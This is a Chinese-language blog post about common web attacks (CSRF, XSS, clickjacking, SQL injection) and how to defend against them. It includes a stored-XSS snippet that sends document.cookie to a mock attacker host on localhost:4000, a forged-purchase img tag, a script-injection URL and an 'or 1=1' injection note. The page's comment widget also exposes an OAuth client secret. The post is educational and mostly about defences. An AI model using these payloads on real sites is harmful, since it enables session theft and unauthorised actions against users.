<!DOCTYPE html>
<html lang="zh-Hans">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <title>
        常见web攻击手段及防御措施 |
        
        Single-Minded&#39;s Blog
    </title>
    <link rel="shortcut icon" href="/single-minded/images/logo.svg">
    
<link rel="stylesheet" href="/single-minded/css/style.css">

    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/css/font-awesome.min.css">
    <script id="hexo-configurations">
    let KEEP = window.KEEP || {};
    KEEP.hexo_config = {"hostname":"agangxuezhang.cn","root":"/single-minded/"};
    KEEP.theme_config = {"toc":{"enable":true,"number":true,"expand_all":true},"style":{"primary_color":"#0066CC","avatar":"/images/avatar.png","favicon":"/images/logo.svg","img_position":"left","left_side_width":"260px","content_max_width":"900px","hover":{"shadow":true,"scale":false},"first_screen":{"enable":true,"background_img":"../images/bg.jpg","description":"她呀，脸爱红。"}},"local_search":{"enable":false,"trigger":"auto","unescape":false,"preload":false},"version":"3.0.4"};
    KEEP.language = {"search":"Search...","prev":"Prev","next":"Next","prev_posts":"Prev posts","next_posts":"Next posts","page":"Page %d","recent_posts":"Recent Posts","share":"Share","powered_by":"Powered by %s","theme":"Theme","rss_feed":"RSS Feed","category":"Category","categories":"Categories","tag":"Tag","tags":"Tags","tagcloud":"Tag Cloud","comment":"Comment","home":"Home","archive":"Archive","archives":"Archives","about":"About","site_uv":"Visitor Count","site_pv":"Totalview","links":"Links","link":"Link","top":"TOP","read_more":"Read more","wordcount":"Words","min2read":"Mins","changelog":"Changelog","copyright":{"author":"Post author","title":"Post title","link":"Post link","create_time":"Create time","license_title":"Copyright Notice","license_content":"All articles in this blog are licensed under %s unless stating additionally."},"ago":{"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days age","week":"%s weeks age","month":"%s months age","year":"%s years age"}};
  </script>
<meta name="generator" content="Hexo 5.3.0"></head>


<body>
<div class="page-container">

    

    <header class="page-header">
        <div class="header-progress"></div>
    </header>

    <main class="page-main">

        <div class="page-main-content">

            <div class="page-main-content-top">
                <header class="header-wrapper">

    <div class="header-content">
        <a class="logo-title" href="/">
            Single-Minded&#39;s Blog
        </a>

        <ul class="menu-list">
            
                <li class="menu-item">
                    <a class=""
                       href="/single-minded/"
                    >
                        首页
                    </a>
                </li>
            
                <li class="menu-item">
                    <a class=""
                       href="/single-minded/archives"
                    >
                        归档
                    </a>
                </li>
            
                <li class="menu-item">
                    <a class=""
                       href="/single-minded/categories"
                    >
                        分类
                    </a>
                </li>
            
                <li class="menu-item">
                    <a class=""
                       href="/single-minded/tags"
                    >
                        标签
                    </a>
                </li>
            
        </ul>

        <div class="menu-bar">
            <div class="menu-bar-middle"></div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/single-minded/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/single-minded/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/single-minded/categories">分类</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/single-minded/tags">标签</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


            </div>

            <div class="page-main-content-middle">

                <main class="main-content normal-code-theme">

                    
                        <div class="fade-in-down-animation">
    <div class="article-content-container">

        <div class="article-title">
            <span class="title-hover-animation">常见web攻击手段及防御措施</span>
        </div>

        
            <div class="article-header">
                <div class="avatar">
                    <img src="/single-minded/images/avatar.png">
                </div>
                <div class="info">
                    <div class="author">
                        <span>无骛</span>
                        <span class="level">Lv1</span>
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fas fa-calendar"></i> 2020-12-29 23:53:42
    </span>
    
        <span class="article-categories article-meta-item">
            <i class="fas fa-folder"></i>
            <ul>
                
                    <li>
                        <a href="/single-minded/categories/%E5%89%8D%E7%AB%AF/">前端</a>
                    </li>
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fas fa-tags"></i>
            <ul>
                
                    <li>
                        <a href="/single-minded/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">网络安全</a>
                    </li>
                
            </ul>
        </span>
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fas fa-file-word"></i> <span>2.2k 字</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fas fa-clock"></i> <span>8 分钟</span>
        </span>
    
    
        <span class="article-pv article-meta-item">
            <i class="fas fa-eye"></i> <span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        <div class="article-content markdown-body">
            <h2 id="CSRF-攻击：跨站请求伪造"><a href="#CSRF-攻击：跨站请求伪造" class="headerlink" title="CSRF 攻击：跨站请求伪造"></a>CSRF 攻击：跨站请求伪造</h2><blockquote>
<p> 跨站请求伪造 CSRF (Cross-site request forgery)，是一种挟制用户在当前已登录的 Web 应用程序上执行非本意操作的攻击方法。</p>
</blockquote>
<p>​    它利用用户已经登录的身份信息，在用户无感的情况下，以用户的名义完成操作。</p>
<h3 id="攻击流程"><a href="#攻击流程" class="headerlink" title="攻击流程"></a>攻击流程</h3><p>​    一次 CSRF 攻击发生的过程可能是这样：<br><img src="https://cdn.jsdelivr.net/gh/huangwenjuning/single-minded-images@master/%E5%B8%B8%E8%A7%81web%E6%94%BB%E5%87%BB%E6%89%8B%E6%AE%B5%E5%8F%8A%E9%98%B2%E5%BE%A1%E6%8E%AA%E6%96%BD/CSRF-%E6%94%BB%E5%87%BB%E6%B5%81%E7%A8%8B%E5%9B%BE%E7%A4%BA.png" alt="CSRF-攻击流程图示"></p>
<p>​        我们来简述一下图示流程：</p>
<p>​            A. 用户 A 登录购物网站 <a class="link"   target="_blank" rel="noopener" href="http://www.example.shop,并获取到/" >http://www.example.shop，并获取到<i class="fas fa-external-link-alt"></i></a> cookie。</p>
<p>​            B. 攻击者事先知道该购物网站完成一次购物操作的URL，因此事先将脚本注入页面，例如：<br><code>&lt;img src=&quot;http://www.example.shop/buy?productId=00010&amp;count=10&amp;address=example&quot;&gt;</code></p>
<p>​            C. 在用户 A  没有登出购物网站（即cookie未失效）的情况下，访问了攻击者网站。此时攻击者网站会返回具有恶意脚本的页面，伪造用户发送请求到服务器。</p>
<p>​            由此可知，攻击关键就是欺骗用户浏览器，让其以用户的名义发出请求，进行操作。</p>
<h3 id="攻击演练"><a href="#攻击演练" class="headerlink" title="攻击演练"></a>攻击演练</h3><p>下面我会通过开启两个服务， <a class="link"   target="_blank" rel="noopener" href="http://localhost:3000/%E6%A8%A1%E6%8B%9F%E8%B4%AD%E7%89%A9%E7%BD%91%E7%AB%99%EF%BC%8Chttp://localhost:4000/%E6%A8%A1%E6%8B%9F%E9%BB%91%E5%AE%A2%E7%BD%91%E7%AB%99" >http://localhost:3000/模拟购物网站，http://localhost:4000/模拟黑客网站<i class="fas fa-external-link-alt"></i></a></p>
<p>A. 模拟用户登录购物网站，获取 cookie 信息<br><img src="https://cdn.jsdelivr.net/gh/huangwenjuning/single-minded-images@master/%E5%B8%B8%E8%A7%81web%E6%94%BB%E5%87%BB%E6%89%8B%E6%AE%B5%E5%8F%8A%E9%98%B2%E5%BE%A1%E6%8E%AA%E6%96%BD/CSRF-%E6%A8%A1%E6%8B%9F%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95.png" alt="CSRF-模拟用户登录"></p>
<p>B. 模拟用户访问黑客网站，黑客网站中事先注入了攻击脚本：<br><img src="https://cdn.jsdelivr.net/gh/huangwenjuning/single-minded-images@master/%E5%B8%B8%E8%A7%81web%E6%94%BB%E5%87%BB%E6%89%8B%E6%AE%B5%E5%8F%8A%E9%98%B2%E5%BE%A1%E6%8E%AA%E6%96%BD/CSRF-%E9%BB%91%E5%AE%A2%E7%BD%91%E7%AB%99.png" alt="CSRF-黑客网站"></p>
<p>​    刷新购物网站，发现被攻击了：<br><img src="https://cdn.jsdelivr.net/gh/huangwenjuning/single-minded-images@master/%E5%B8%B8%E8%A7%81web%E6%94%BB%E5%87%BB%E6%89%8B%E6%AE%B5%E5%8F%8A%E9%98%B2%E5%BE%A1%E6%8E%AA%E6%96%BD/CSRF-%E8%A2%AB%E6%94%BB%E5%87%BB%E7%8E%B0%E8%B1%A1%E6%9F%A5%E7%9C%8B.png" alt="CSRF-被攻击现象查看"> </p>
<h3 id="危害"><a href="#危害" class="headerlink" title="危害"></a>危害</h3><p>利用用户登录态，用户不知情情况下进行操作：</p>
<ul>
<li>可盗取用户资金，进行转账消费等操作</li>
<li>可冒充用户发帖、进行恶意言论等</li>
</ul>
<h3 id="防御措施"><a href="#防御措施" class="headerlink" title="防御措施"></a>防御措施</h3><ul>
<li><p>设置 Referer 字段</p>
<p>Referer 请求头标识当前请求是从哪个页面发送过来的，服务端可根据该地址判断出是否是恶意请求。</p>
<p>局限性：完全依赖于浏览器发送正确的 Referer 字段，我们无法保证浏览器内部对 Referer 的实现。</p>
</li>
<li><p>通过手机验证码或token进行校验</p>
</li>
</ul>
<h2 id="XSS-攻击：跨站脚本攻击"><a href="#XSS-攻击：跨站脚本攻击" class="headerlink" title="XSS 攻击：跨站脚本攻击"></a>XSS 攻击：跨站脚本攻击</h2><blockquote>
<p>跨站脚本攻击 XSS (Cross Site Scripting)，因为和层叠样式 CSS相同，所有简称为 XSS，是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中，当正常用户访问该页面时，则可导致嵌入的恶意脚本代码的执行，从而达到恶意攻击用户的目的。</p>
</blockquote>
<h3 id="攻击类型及攻击流程"><a href="#攻击类型及攻击流程" class="headerlink" title="攻击类型及攻击流程"></a>攻击类型及攻击流程</h3><p>  XSS 攻击又可分为：</p>
<ul>
<li><p>持久型</p>
<p>存储型：恶意脚本被存储到数据库中，当用户访问注入了恶意脚本的页面时，就会执行恶意代码。</p>
<p>存储型一般出现在网站留言、评论、博客日志等交互处，恶意脚本存储到客户端或者服务端的数据库中。</p>
<p><img src="https://cdn.jsdelivr.net/gh/huangwenjuning/single-minded-images@master/%E5%B8%B8%E8%A7%81web%E6%94%BB%E5%87%BB%E6%89%8B%E6%AE%B5%E5%8F%8A%E9%98%B2%E5%BE%A1%E6%8E%AA%E6%96%BD/XSS-%E5%AD%98%E5%82%A8%E5%9E%8B%E6%94%BB%E5%87%BB%E6%B5%81%E7%A8%8B%E5%9B%BE.png" alt="XSS-存储型攻击流程图"></p>
</li>
<li><p>非持久型（反射型和DOM XSS）</p>
<p>一般是攻击者通过特定方法，诱导用户访问恶意代码 URL，通过 URL 参数注入恶意代码。<br><img src="https://cdn.jsdelivr.net/gh/huangwenjuning/single-minded-images@master/%E5%B8%B8%E8%A7%81web%E6%94%BB%E5%87%BB%E6%89%8B%E6%AE%B5%E5%8F%8A%E9%98%B2%E5%BE%A1%E6%8E%AA%E6%96%BD/XSS-%E5%8F%8D%E5%B0%84%E5%9E%8B%E6%B5%81%E7%A8%8B%E5%9B%BE%E7%A4%BA.png" alt="XSS-反射型流程图示"><br><img src="https://cdn.jsdelivr.net/gh/huangwenjuning/single-minded-images@master/%E5%B8%B8%E8%A7%81web%E6%94%BB%E5%87%BB%E6%89%8B%E6%AE%B5%E5%8F%8A%E9%98%B2%E5%BE%A1%E6%8E%AA%E6%96%BD/XSS-DOMXSS%E6%B5%81%E7%A8%8B%E5%9B%BE%E7%A4%BA.png" alt="XSS-DOMXSS流程图示"></p>
</li>
</ul>
<pre><code>可以发现，反射型与DOM XSS 的区别就在于，
DOM XSS 攻击取出和执行恶意代码都由浏览器完成，属于前端JavaScript的安全漏洞，
而反射型属于服务端的安全漏洞。</code></pre>
<h3 id="攻击演练-1"><a href="#攻击演练-1" class="headerlink" title="攻击演练"></a>攻击演练</h3><h4 id="存储型攻击演练"><a href="#存储型攻击演练" class="headerlink" title="存储型攻击演练"></a>存储型攻击演练</h4><p>  ​    A. 黑客登录某论坛，在评论时注入恶意脚本，点击发布：<img src="https://cdn.jsdelivr.net/gh/huangwenjuning/single-minded-images@master/%E5%B8%B8%E8%A7%81web%E6%94%BB%E5%87%BB%E6%89%8B%E6%AE%B5%E5%8F%8A%E9%98%B2%E5%BE%A1%E6%8E%AA%E6%96%BD/XSS-%E5%AD%98%E5%82%A8%E5%9E%8B%E6%B3%A8%E5%85%A5.png" alt="XSS-存储型注入"></p>
<p>  注入脚本代码可以是：</p>
  <figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> img = <span class="keyword">new</span> Image();</span><br><span class="line">img.src=<span class="string">&#x27;http://localhost:4000/?cookie=&#x27;</span>+<span class="built_in">document</span>.cookie;</span><br></pre></td></tr></table></figure>
<p>  B. 当其他用户登录并访问该评论列表时，恶意脚本被执行，黑客便能够拿到用户信息，例如上述黑客注入的代码中能够获取到用户的 cookie 信息:<img src="https://cdn.jsdelivr.net/gh/huangwenjuning/single-minded-images@master/%E5%B8%B8%E8%A7%81web%E6%94%BB%E5%87%BB%E6%89%8B%E6%AE%B5%E5%8F%8A%E9%98%B2%E5%BE%A1%E6%8E%AA%E6%96%BD/XSS-%E5%AD%98%E5%82%A8%E5%9E%8B%E8%8E%B7%E5%8F%96%E5%88%B0%E7%94%A8%E6%88%B7cookie.png" alt="XSS-存储型获取到用户cookie"></p>
<h4 id="反射型攻击演练"><a href="#反射型攻击演练" class="headerlink" title="反射型攻击演练"></a>反射型攻击演练</h4><p>​    A. 攻击者通过诱导用户点击恶意 URL， URL可能是这样：</p>
<p>​        <code>http://localhost:3000/?from=&lt;script&gt;alert(&#39;我是一段恶意攻击脚本！&#39;)&lt;/script&gt;</code></p>
<p>​    B.服务器接收到参数，将恶意代码取出拼接在用户 HTML 中，用户浏览器接收后进行执行，其中恶意代码        也被执行了。<img src="https://cdn.jsdelivr.net/gh/huangwenjuning/single-minded-images@master/%E5%B8%B8%E8%A7%81web%E6%94%BB%E5%87%BB%E6%89%8B%E6%AE%B5%E5%8F%8A%E9%98%B2%E5%BE%A1%E6%8E%AA%E6%96%BD/XSS-%E5%8F%8D%E5%B0%84%E5%9E%8B%E6%94%BB%E5%87%BB-%E5%8F%82%E6%95%B0%E6%B3%A8%E5%85%A5.png" alt="XSS-反射型攻击-参数注入"></p>
<h4 id="DOM-XSS-演练"><a href="#DOM-XSS-演练" class="headerlink" title="DOM XSS 演练"></a>DOM XSS 演练</h4><p>​    A.攻击者通过诱导用户点击恶意 URL， URL可能是这样：<br>​        <code>http://localhost:3000/?from=&lt;script&gt;alert(&#39;我是一段恶意攻击脚本！&#39;)&lt;/script&gt;</code><br>​    B.前端浏览器接收并解析参数，将恶意代码取出拼接在用户 HTML 中进行执行。<br><img src="https://cdn.jsdelivr.net/gh/huangwenjuning/single-minded-images@master/%E5%B8%B8%E8%A7%81web%E6%94%BB%E5%87%BB%E6%89%8B%E6%AE%B5%E5%8F%8A%E9%98%B2%E5%BE%A1%E6%8E%AA%E6%96%BD/XSS-%E5%8F%8D%E5%B0%84%E5%9E%8B%E6%94%BB%E5%87%BB-%E5%8F%82%E6%95%B0%E6%B3%A8%E5%85%A5.png" alt="XSS-反射型攻击-参数注入"></p>
<h3 id="危害-1"><a href="#危害-1" class="headerlink" title="危害"></a>危害</h3><blockquote>
<p>1、盗用<a class="link"   target="_blank" rel="noopener" href="https://baike.baidu.com/item/cookie/1119" >cookie<i class="fas fa-external-link-alt"></i></a>，获取敏感信息。</p>
<p>2、利用植入Flash，通过crossdomain权限设置进一步获取更高权限；或者利用<a class="link"   target="_blank" rel="noopener" href="https://baike.baidu.com/item/Java/85979" >Java<i class="fas fa-external-link-alt"></i></a>等得到类似的操作。</p>
<p>3、利用<a class="link"   target="_blank" rel="noopener" href="https://baike.baidu.com/item/iframe/4446518" >iframe<i class="fas fa-external-link-alt"></i></a>、frame、<a class="link"   target="_blank" rel="noopener" href="https://baike.baidu.com/item/XMLHttpRequest/6788735" >XMLHttpRequest<i class="fas fa-external-link-alt"></i></a>或上述Flash等方式，以（被攻击）用户的身份执行一些管理动作，或执行一些一般的如发微博、加好友、发私信等操作。</p>
<p>4、利用可被攻击的域受到其他域信任的特点，以受信任来源的身份请求一些平时不允许的操作，如进行不当的投票活动。</p>
</blockquote>
<h3 id="防御措施-1"><a href="#防御措施-1" class="headerlink" title="防御措施"></a>防御措施</h3><h4 id="X-XSS-Protection"><a href="#X-XSS-Protection" class="headerlink" title="X-XSS-Protection"></a>X-XSS-Protection</h4><blockquote>
<p>HTTP X-XSS-Protection 响应头是 Internet Explorer，Chrome 和 Safari 的一个特性，当检测到跨站脚本攻击 (XSS)时，浏览器将停止加载页面。<br>配置参数：<br>    0 - 禁止 XSS 过滤。<br>    1 - 启用 XSS 过滤（通常浏览器是默认的）。浏览器检测到攻击后将去除不安全部分<br>    1;mode=block - 启用 XSS 过滤，检测到攻击之后，不会清除不安全部分，而是阻止页面加载<br>    1;report=<reporting-URI>  (Chromium only) - 启用XSS过滤。 如果检测到跨站脚本攻击，浏览器将清除页面并使用CSP report-uri指令的功能发送违规报告。</p>
</blockquote>
<h4 id="进行转义处理"><a href="#进行转义处理" class="headerlink" title="进行转义处理"></a>进行转义处理</h4><h4 id="网页安全政策-CSP-Content-Security-Policy"><a href="#网页安全政策-CSP-Content-Security-Policy" class="headerlink" title="网页安全政策 CSP (Content Security Policy)"></a>网页安全政策 CSP (Content Security Policy)</h4><pre><code>CSP 类似于白名单机制，即告诉客户端，哪些外部资源可执行。
可通过设置 HTTP 头信息字段 Content-Security-Policy 和 &lt;meta&gt;&lt;/meta&gt;标签进行设置。
CSP 可设置范围：
   (1) 资源加载限制
 　　script-src：外部脚本
 　　style-src：样式表
 　　img-src：图像
 　　media-src：媒体文件（音频和视频）
 　　font-src：字体文件
 　　object-src：插件（比如 Flash
 　　child-src：框架
　　 frame-ancestors：嵌入的外部资源（比如&lt;frame&gt;、&lt;iframe&gt;、&lt;embed&gt;和&lt;applet&gt;）
 　　connect-src：HTTP 连接（通过 XHR、WebSockets、EventSource等）
 　　worker-src：worker脚本
 　　manifest-src：manifest 文件

   (2) default-src
    Content-Security-Policy: default-src &#39;self&#39;
    可用于设置资源加载限制各项配置的默认值
   (3) script-src

 　　&#39;unsafe-inline&#39;：允许执行页面内嵌的&amp;lt;script&gt;标签和事件监听函数
 　　&#39;unsafe-eval&#39;：允许将字符串当作代码执行，
 　　　比如使用eval、setTimeout、setInterval和Function等函数。
  　　nonce值：每次HTTP回应给出一个授权token，页面内嵌脚本必须有这个token，才会执行
  　　hash值：列出允许执行的脚本代码的Hash值，页面内嵌脚本的哈希值只有吻合的情况下，才能执行。</code></pre>
<h4 id="开启-HttpOnly"><a href="#开启-HttpOnly" class="headerlink" title="开启 HttpOnly"></a>开启 HttpOnly</h4><pre><code>开启 HttpOnly 后，cookie 将不可通过 JavaScript 的
document.cookie 属性、XMLHttpRequest 和 Request API 进行访问，
攻击者完成注入后便无法通过 JavaScript 窃取到 cookie 信息</code></pre>
<h4 id="采用成熟渲染框架"><a href="#采用成熟渲染框架" class="headerlink" title="采用成熟渲染框架"></a>采用成熟渲染框架</h4><pre><code>例如 react jsx，createElement方法已经做了 XSS 防范，会对字符进行转义处理</code></pre>
<h4 id="进行验证码验证"><a href="#进行验证码验证" class="headerlink" title="进行验证码验证"></a>进行验证码验证</h4><h4 id="对不受信任的输入，限制一定的长度"><a href="#对不受信任的输入，限制一定的长度" class="headerlink" title="对不受信任的输入，限制一定的长度"></a>对不受信任的输入，限制一定的长度</h4><h4 id="避免使用容易被-XSS-攻击的API"><a href="#避免使用容易被-XSS-攻击的API" class="headerlink" title="避免使用容易被 XSS 攻击的API"></a>避免使用容易被 XSS 攻击的API</h4><pre><code>在使用 .innerHTML、.outerHTML、document.write() 时，
不要把不可信的数据作为 HTML 插到页面上，而应尽量使用 .textContent、.setAttribute() 等。

DOM 中的内联事件监听器，如location、onclick、onerror、onload、onmouseover 等，
&lt;a&gt; 标签的 href 属性，JavaScript 的 eval()、setTimeout()、setInterval()等，
都能把字符串作为代码运行。
如果不可信的数据拼接到字符串中传递给这些API，很容易产生安全隐患，应尽量避免使用。</code></pre>
<h2 id="iframe-攻击"><a href="#iframe-攻击" class="headerlink" title="iframe 攻击"></a>iframe 攻击</h2><p>可设置 X-Frame-Options：X-FRAME-OPTIONS 是一个 HTTP响应头，在现代浏览器有一个很好的支持。这个 HTTP 响应头 就是为了防御用 iframe 嵌套的点击劫持攻击。该响应头有三个值可选，分别是:<br>　　DENY，表示页面不允许通过 iframe 的方式展示 　　<br>　　SAMEORIGIN，表示页面可以在相同域名下通过 iframe 的方式展示<br>　　ALLOW-FROM，表示页面可以在指定来源的 iframe 中展示</p>
<h2 id="SQL-注入"><a href="#SQL-注入" class="headerlink" title="SQL 注入"></a>SQL 注入</h2><pre><code>通过注入 sql 语句，可以拿到用户信息，比如设置永真语句：or 1=1
可通过 sql 上传文件到攻击网站，植入木马，可接管对方服务器
可通过 sql 语句创建账号密码，登录攻击网站进行操作</code></pre>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a class="link"   target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/13777878?fromtitle=CSRF&fromid=2735433&fr=aladdin" >百度百科·跨站请求伪造<i class="fas fa-external-link-alt"></i></a><br><a class="link"   target="_blank" rel="noopener" href="https://baike.baidu.com/item/XSS%E6%94%BB%E5%87%BB/954065?fr=aladdin" >百度百科·XSS攻击<i class="fas fa-external-link-alt"></i></a><br><a class="link"   target="_blank" rel="noopener" href="https://segmentfault.com/a/1190000016551188" >前端安全系列（一）：如何防止XSS攻击？<i class="fas fa-external-link-alt"></i></a><br><a class="link"   target="_blank" rel="noopener" href="http://www.ruanyifeng.com/blog/2016/09/csp.html" >Content Security Policy 入门教程<i class="fas fa-external-link-alt"></i></a><br>其他视频学习</p>

        </div>

        
            <div class="post-copyright-info">
                <div class="article-copyright-info-container">
    <ul>
        <li>本文标题：常见web攻击手段及防御措施</li>
        <li>本文作者：无骛</li>
        <li>创建时间：2020-12-29 23:53:42</li>
        <li>
            本文链接：http://agangxuezhang.cn/single-minded/2020/12/29/常见web攻击手段及防御措施/
        </li>
        <li>
            版权声明：本博客所有文章除特别声明外，均采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> 许可协议。转载请注明出处！
        </li>
    </ul>
</div>

            </div>
        

        
            <div class="article-nav">
                
                
                    <div class="article-next">
                        <a class="next"
                           rel="next"
                           href="/single-minded/2020/12/29/hello-world/"
                        >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">Hello World</span>
                                <span class="post-nav-item">下一篇</span>
                            </span>
                            <span class="right arrow-icon flex-center" >
                              <i class="fas fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        

        
            <div class="comment-container">
                <div class="comments-container">
    <div id="comment-anchor"></div>
    
        
    <script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
    <div id="gitalk-container"></div>
    <script>
        let __gitalk__pathname = decodeURI(location.pathname);
        const __gitalk__pathnameLength = __gitalk__pathname.length;
        const __gitalk__pathnameMaxLength = 50;
        if (__gitalk__pathnameLength > __gitalk__pathnameMaxLength) {
            __gitalk__pathname = __gitalk__pathname.substring(0, __gitalk__pathnameMaxLength - 3) + '...';
        }
        const gitalk = new Gitalk({
            clientID: '8d8af87b5ff517e514b2',
            clientSecret: '96108e1b547154d5eea0033e38127b08acc5aeb9',
            repo: 'single-minded-comments',
            owner: 'huangwenjuning',
            admin: ['huangwenjuning'],
            id: __gitalk__pathname,
            language: 'zh-Hans'
        })
        gitalk.render('gitalk-container')
    </script>


    
</div>

            </div>
        
    </div>
</div>


                    
                </main>

            </div>

            <div class="page-main-content-bottom">
                <footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
              <span>2020</span> -
            
            2020 <i class="fas fa-heart icon-animate"></i> <a href="/">无骛</a>
        </div>
        
            <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    <span id="busuanzi_container_site_uv">
                        访问人数 <span id="busuanzi_value_site_uv"></span>&ensp;
                    </span>
                
                
                    <span id="busuanzi_container_site_pv">
                        总访问量 <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="theme-info info-item">
            由 <a target="_blank" href="https://hexo.io">Hexo</a> 驱动 | 主题 <a class="theme-version" target="_blank"></a>
        </div>
    </div>
</footer>

            </div>
        </div>
    </main>

    <div class="sidebar-tools">
        <div class="tools-container">
    <ul class="tools-list">
        

        
            <li class="go-comment">
                <i class="fas fa-comment"></i>
            </li>
        

        <!-- TOC aside toggle -->
        
            <li class="tools-item page-aside-toggle">
                <i class="fas fa-outdent"></i>
            </li>
        

    </ul>
</div>

    </div>

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">

    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-expand-width flex-center">
            <i class="fas fa-arrows-alt-h"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        <li class="tools-item tool-scroll-to-top flex-center">
            <i class="fas fa-arrow-up"></i>
        </li>

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="tools-ul-1">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

    </ul>
</div>

    </div>

    <!-- page aside -->
    <aside class="page-aside">
        
            <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#CSRF-%E6%94%BB%E5%87%BB%EF%BC%9A%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0"><span class="nav-number">1.</span> <span class="nav-text">CSRF 攻击：跨站请求伪造</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E6%B5%81%E7%A8%8B"><span class="nav-number">1.1.</span> <span class="nav-text">攻击流程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E6%BC%94%E7%BB%83"><span class="nav-number">1.2.</span> <span class="nav-text">攻击演练</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8D%B1%E5%AE%B3"><span class="nav-number">1.3.</span> <span class="nav-text">危害</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%98%B2%E5%BE%A1%E6%8E%AA%E6%96%BD"><span class="nav-number">1.4.</span> <span class="nav-text">防御措施</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS-%E6%94%BB%E5%87%BB%EF%BC%9A%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%94%BB%E5%87%BB"><span class="nav-number">2.</span> <span class="nav-text">XSS 攻击：跨站脚本攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E7%B1%BB%E5%9E%8B%E5%8F%8A%E6%94%BB%E5%87%BB%E6%B5%81%E7%A8%8B"><span class="nav-number">2.1.</span> <span class="nav-text">攻击类型及攻击流程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E6%BC%94%E7%BB%83-1"><span class="nav-number">2.2.</span> <span class="nav-text">攻击演练</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%AD%98%E5%82%A8%E5%9E%8B%E6%94%BB%E5%87%BB%E6%BC%94%E7%BB%83"><span class="nav-number">2.2.1.</span> <span class="nav-text">存储型攻击演练</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E5%B0%84%E5%9E%8B%E6%94%BB%E5%87%BB%E6%BC%94%E7%BB%83"><span class="nav-number">2.2.2.</span> <span class="nav-text">反射型攻击演练</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#DOM-XSS-%E6%BC%94%E7%BB%83"><span class="nav-number">2.2.3.</span> <span class="nav-text">DOM XSS 演练</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8D%B1%E5%AE%B3-1"><span class="nav-number">2.3.</span> <span class="nav-text">危害</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%98%B2%E5%BE%A1%E6%8E%AA%E6%96%BD-1"><span class="nav-number">2.4.</span> <span class="nav-text">防御措施</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#X-XSS-Protection"><span class="nav-number">2.4.1.</span> <span class="nav-text">X-XSS-Protection</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%BF%9B%E8%A1%8C%E8%BD%AC%E4%B9%89%E5%A4%84%E7%90%86"><span class="nav-number">2.4.2.</span> <span class="nav-text">进行转义处理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" 